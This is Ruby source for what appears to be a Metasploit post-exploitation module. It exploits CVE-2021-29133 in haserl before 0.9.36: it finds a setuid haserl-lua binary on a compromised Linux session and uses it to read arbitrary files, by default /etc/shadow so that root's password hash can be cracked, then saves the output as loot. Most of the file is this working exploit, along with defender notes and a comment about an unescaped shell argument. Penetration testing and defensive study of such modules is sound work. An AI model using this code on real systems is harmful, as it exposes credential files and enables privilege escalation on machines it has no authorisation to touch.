

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/haserl_read.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module for an existing Linux session ('shell' or 'meterpreter') that
# covers CVE-2021-29133. Per the module description, haserl prior to 0.9.36
# can be used to read arbitrary files.
#
# What the code below does: it asks for the setuid files under /usr/bin, keeps
# those whose basename starts with 'haserl-lua', runs the first match with
# RFILE as its only argument and stores the command output as loot.
#
# Notes for defenders reading this file:
# - Only setuid haserl-lua* files in /usr/bin are considered, so a setuid-file
#   audit of that directory checks the same precondition this module relies on.
# - The affected range stated in the description is "prior to 0.9.36"; hosts
#   on that release or later fall outside it.
# - The metadata declares IOC_IN_LOGS, i.e. the authors expect a run to leave
#   indicators in logs. Which logs is not stated in this file.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  # Registers the module metadata and the single RFILE option.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Haserl Arbitrary File Reader',
        'Description' => %q{
          This module exploits haserl prior to 0.9.36 to read arbitrary files.
          The most widely accepted exploitation vector is reading /etc/shadow,
          which will reveal root's hash for cracking.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Julien (jvoisin) Voisin', # metasploit module
          'Ike Broflovski' # discovery
        ],
        'Platform' => ['linux'],
        'SessionTypes' => %w[shell meterpreter],
        'References' => [
          ['URL', 'https://twitter.com/steaIth/status/1364940271054712842'],
          ['URL', 'https://gitlab.alpinelinux.org/alpine/aports/-/issues/12539'],
          ['CVE', '2021-29133']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    # RFILE is required and defaults to /etc/shadow.
    register_options(
      [
        OptString.new('RFILE', [true, 'File to read', '/etc/shadow'])
      ]
    )
  end

  # Collects the setuid files reported for /usr/bin and keeps the ones whose
  # basename starts with 'haserl-lua'.
  #
  # @return the matching entries, or nil when get_suid_files raises a
  #   StandardError or returns a falsy value (presumably the entries are path
  #   strings; confirm against get_suid_files)
  def haserl_lua_paths
    # Only the lookup itself is guarded; an error while filtering still
    # propagates to the caller.
    suid_files = begin
      get_suid_files('/usr/bin')
    rescue StandardError
      nil
    end
    return unless suid_files

    suid_files.select { |path| File.basename(path).start_with?('haserl-lua') }
  end

  # Entry point: refuses to run as root, locates a setuid haserl-lua binary,
  # runs it against RFILE and stores non-empty output as loot.
  def run
    # A root session can read the file directly, so the module treats this as
    # a configuration error.
    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?

    candidates = haserl_lua_paths
    nothing_found = candidates.nil? || candidates.empty?
    fail_with(Failure::NotVulnerable, 'Could not find setuid haserl lua executable in /usr/bin/') if nothing_found

    # When several binaries match, only the first one is used.
    binary = candidates.first
    print_good("Found set-uid haserl: #{binary}")

    rfile = datastore['RFILE']
    # NOTE(review): RFILE is placed between single quotes without escaping, so
    # a value that itself contains a single quote is not handled.
    output = cmd_exec("#{binary} '#{rfile}'")

    # Nothing is stored or reported when the command prints nothing.
    return if output.empty?

    # The loot type and the stored file name share the same label, built from
    # the lower-cased basename of RFILE.
    fname = File.basename(rfile.downcase)
    loot_label = "haserl_#{fname}"
    loot_path = store_loot(loot_label, 'text/plain', session, output, loot_label, 'haserl arbitrary read')
    vprint_good("#{fname} saved in: #{loot_path}")
  end
end